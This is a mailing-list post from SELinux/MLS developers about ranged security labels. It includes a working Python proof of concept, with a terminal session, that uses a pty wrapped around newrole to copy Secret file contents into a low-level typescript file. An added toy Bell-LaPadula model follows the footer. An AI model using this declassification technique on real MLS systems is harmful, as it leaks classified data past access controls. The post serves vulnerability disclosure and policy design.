On Thu, Jul 06, 2006 at 09:14:44AM -0700, Casey Schaufler wrote:
> --- "Knoke, Jim (US SSA)" <[EMAIL PROTECTED]>
> > On the one hand I understand how multi-level objects can complicate
> > analysis, but if we are to allow directories to contain upgraded
> > objects and devices to have ranges, it sort of sounds more consistent
> > to allow a range on any kind of object.
>
> If I put a range of Unclass to TopSecret on a file and write TopSecret
> information to it an Unclass user can read it. This fails the MLS
> requirement.
Yes, it's generally unacceptable for files, and it's an information leak
for filenames readable in directories.
In the case of devices, multilevel access is only acceptable for specific
objects that don't actually store data, such as /dev/zero, and for those
I think it's more appropriate to use the "trusted object" override to
emphasize their special status.
PTY devices are currently a problem. It's simple for a user cleared for a
range of labels to create a program that declassifies information without
needing any special privileges. For example:
- running at the low level, create a pty master/slave pair.
- on the slave end, spawn newrole to switch to a high level, send your
password through the pty.
- on the slave end, execute "cat secret_file".
- as unprivileged process, read the secret data from the pty master end
and write it to a low file.
The following program is an example: it's a wrapper for "newrole" with a
built-in "typescript" capability, which isn't supposed to work without
having some type of override capability:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[EMAIL PROTECTED] ~]$ id -Z
staff_u:staff_r:staff_t:SystemLow-SystemHigh
[EMAIL PROTECTED] ~]$ python newrole_typescript.py -l s2-s2 -- -c "ls -lZ
secret_file.txt; cat secret_file.txt"
Authenticating kw.
Password:
-rw-rw-r-- kw kw staff_u:object_r:staff_home_t:Secret
secret_file.txt
this is secret
[EMAIL PROTECTED] ~]$ ls -lZ typescript.txt
-rw-rw-r-- kw kw staff_u:object_r:staff_home_t:SystemLow
typescript.txt
[EMAIL PROTECTED] ~]$ cat typescript.txt
-rw-rw-r-- kw kw staff_u:object_r:staff_home_t:Secret
secret_file.txt
this is secret
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Here's the script:
#!/usr/bin/env python
import sys
import os
import pty

def copier(fd):
    # pty.spawn() calls this for every chunk read from the pty master;
    # copy the chunk to the typescript file and pass it through unchanged.
    global copy_fd
    data = os.read(fd, 65536)
    copy_fd.write(data)
    return data

def copying_newrole(argv):
    global copy_fd
    # binary mode: os.read() returns bytes
    copy_fd = open('typescript.txt', 'wb')
    args = ['newrole']
    args.extend(argv)
    # run newrole under a pty, routing master-side output through copier()
    pty.spawn(args, copier)
    copy_fd.close()

if __name__ == '__main__':
    copying_newrole(sys.argv[1:])
-Klaus
--
redhat-lspp mailing list
[email protected]
https://www.redhat.com/mailman/listinfo/redhat-lspp
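A toy model of the point Casey makes above about putting a range on a file, added here as an illustration and not code from this thread or from any MLS implementation: it checks reads and writes against a Bell-LaPadula style dominance relation, once for a single-level file and once for a file carrying a range, and reports the data a reader at the low end of the range can see although it was written at a higher level. The level names, object names and the two-ended range rule are assumptions of the model.

```python
# Toy Bell-LaPadula model with ranged object labels. Added illustration for the
# list discussion; not code from the post or from any SELinux/MLS policy.
# Level names and the ranged read/write rule below are assumptions.
LEVELS = {"Unclass": 0, "Confidential": 1, "Secret": 2, "TopSecret": 3}


def dominates(high, low):
    """True if sensitivity level `high` is at or above `low`."""
    return LEVELS[high] >= LEVELS[low]


class MlsObject:
    """An object labelled with a range [low, high]; single-level when low == high."""

    def __init__(self, name, low, high=None):
        self.name = name
        self.low = low
        self.high = high if high is not None else low
        assert dominates(self.high, self.low), "range high must dominate low"
        self.contents = []  # list of (data, level of the writer)

    def single_level(self):
        return self.low == self.high


def can_read(subject_level, obj):
    # Simple security property: the reader must dominate the object's level.
    # For a ranged object the low end of the range is what gets checked.
    return dominates(subject_level, obj.low)


def can_write(subject_level, obj):
    # *-property: the object's level must dominate the writer, so that
    # information never flows downward. For a ranged object the high end
    # of the range is what gets checked.
    return dominates(obj.high, subject_level)


def write(subject_level, obj, data):
    if not can_write(subject_level, obj):
        return False
    obj.contents.append((data, subject_level))
    return True


def read(subject_level, obj):
    if not can_read(subject_level, obj):
        return None
    return [data for data, _ in obj.contents]


def leaks(obj):
    """Data a reader at obj.low could see that was written above obj.low."""
    return [(data, lvl) for data, lvl in obj.contents if not dominates(obj.low, lvl)]


def demo():
    """Run both cases and return the outcomes for inspection."""
    single = MlsObject("secret_file", "Secret")
    ranged = MlsObject("ranged_file", "Unclass", "TopSecret")
    results = {}
    # Single-level file: a TopSecret writer is refused (no write-down), a
    # Secret writer succeeds, an Unclass reader is refused, nothing leaks.
    results["single_ts_write"] = write("TopSecret", single, "ts data")
    results["single_secret_write"] = write("Secret", single, "this is secret")
    results["single_unclass_read"] = read("Unclass", single)
    results["single_leaks"] = leaks(single)
    # Ranged file: the TopSecret writer passes the check against the high
    # end, the Unclass reader passes the check against the low end, and the
    # audit finds TopSecret data readable at Unclass.
    results["ranged_ts_write"] = write("TopSecret", ranged, "ts data")
    results["ranged_unclass_read"] = read("Unclass", ranged)
    results["ranged_leaks"] = leaks(ranged)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

The `leaks()` audit is the useful part for a policy reviewer: any object whose range is wider than a single level, and which stores data, will show entries there as soon as a high writer uses it, which is why the thread reserves ranges for objects like /dev/zero that keep nothing.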